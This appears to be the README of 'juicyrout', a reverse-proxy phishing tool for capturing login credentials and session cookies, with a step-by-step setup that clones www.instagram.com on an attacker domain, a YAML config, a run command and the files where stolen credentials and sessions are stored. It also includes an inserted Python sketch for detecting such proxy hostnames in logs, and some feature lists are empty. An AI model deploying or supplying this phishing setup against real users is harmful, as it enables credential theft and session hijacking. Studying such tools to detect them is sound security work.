juicyrout is a man-in-the-middle attack reverse proxy designed for penetration testers to phish login credentials along with session cookies.
It was developed after experiencing the limitations of evilginx2. The main focus is on the following things:
We use the following technical features to achieve this goal:
Let's imagine that you acquired a new DNS name, for example, `host.juicyrout`, and you want to run a phishing instagram site on the domain `www.host.juicyrout` on port 8091. There are only three things you need to do:
- `*.host.juicyrout`
- e.g. with Let's Encrypt `*.host.juicyrout`
- `juicyrout` with the desired config file

Create a file `config.yaml`:
```yaml
api_token: your_random_token_here
listen_addr: 0.0.0.0:8091
domain_name: host.juicyrout
external_port: 8091
tls_key: wildcard_host_juicyrout_key.pem
tls_cert: wildcard_host_juicyrout_cert.pem
phishlet_file: phishlets/instagram/config.yaml
domain_mappings:
  - proxy: www.host.juicyrout:8091
    target: www.instagram.com
```
- `api_token` is used for authentication in the admin REST API (see api.go).
- `external_port` is used for incoming network traffic (in case you use Docker or run a reverse proxy in front of the juicyrout server, etc.).
- `phishlet_file` is a config file with the phishlet (see the instagram phishlet for reference).
- `domain_mappings` describes a list of mappings between domain names with optional ports. For instance, with the specified configuration file `www.host.juicyrout:8091` will be mapped to `www.instagram.com` in the HTTP request and back in the response, but `super.subdomain.instagram.com` (target address) will be mapped to `super-subdomain-instagram-com.host.juicyrout:8091` (proxy address) by default.

For a complete list of configuration options, see config.go.
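The default mapping leaves a recognizable artifact in DNS and web-proxy logs: the leftmost label of the proxy hostname is the target hostname with its dots replaced by hyphens. The following detection sketch is an added example, not part of juicyrout; the protected-domain list, function names and sample hostnames are constructed assumptions, and explicit `domain_mappings` entries such as `www.host.juicyrout` are not caught by it.

```python
"""Flag hostnames whose first label is a hyphen-encoded protected domain."""

# Assumption: domains the defender wants to watch for (constructed list).
PROTECTED = {"instagram.com", "example-bank.com"}


def strip_port(host):
    """Normalize case, drop a trailing dot and an optional :port suffix."""
    host = host.strip().lower().rstrip(".")
    name, sep, port = host.rpartition(":")
    return name if sep and port.isdigit() else host


def match_encoded(host, protected=PROTECTED):
    """Return (protected_domain, proxy_parent) for a suspicious host, else None."""
    host = strip_port(host)
    label, _, parent = host.partition(".")
    if not parent:
        return None
    # Hosts that really live under a protected domain are legitimate.
    if any(host == d or host.endswith("." + d) for d in protected):
        return None
    # Encode each protected domain the way the proxy does (dots -> hyphens)
    # instead of decoding the label: domains that already contain hyphens
    # (example-bank.com) cannot be decoded unambiguously.
    for domain in sorted(protected, key=len, reverse=True):
        encoded = domain.replace(".", "-")
        if label == encoded or label.endswith("-" + encoded):
            return domain, parent
    return None


# Constructed sample of hostnames as they might appear in a DNS query log.
SAMPLE_HOSTS = [
    "super-subdomain-instagram-com.host.juicyrout:8091",
    "www.instagram.com",
    "login-example-bank-com.host.juicyrout",
    "static-instagram-com.cdn.instagram.com",
    "www.host.juicyrout:8091",
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        hit = match_encoded(h)
        if hit:
            print(f"ALERT {h}: imitates {hit[0]} under {hit[1]}")
```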
Finally, run a phishing server:

```
juicyrout -c config.yaml
```

All captured credentials will by default be stored in the `creds.jsonl` file, and captured sessions will be stored in the `sessions.jsonl` file.
Enjoy!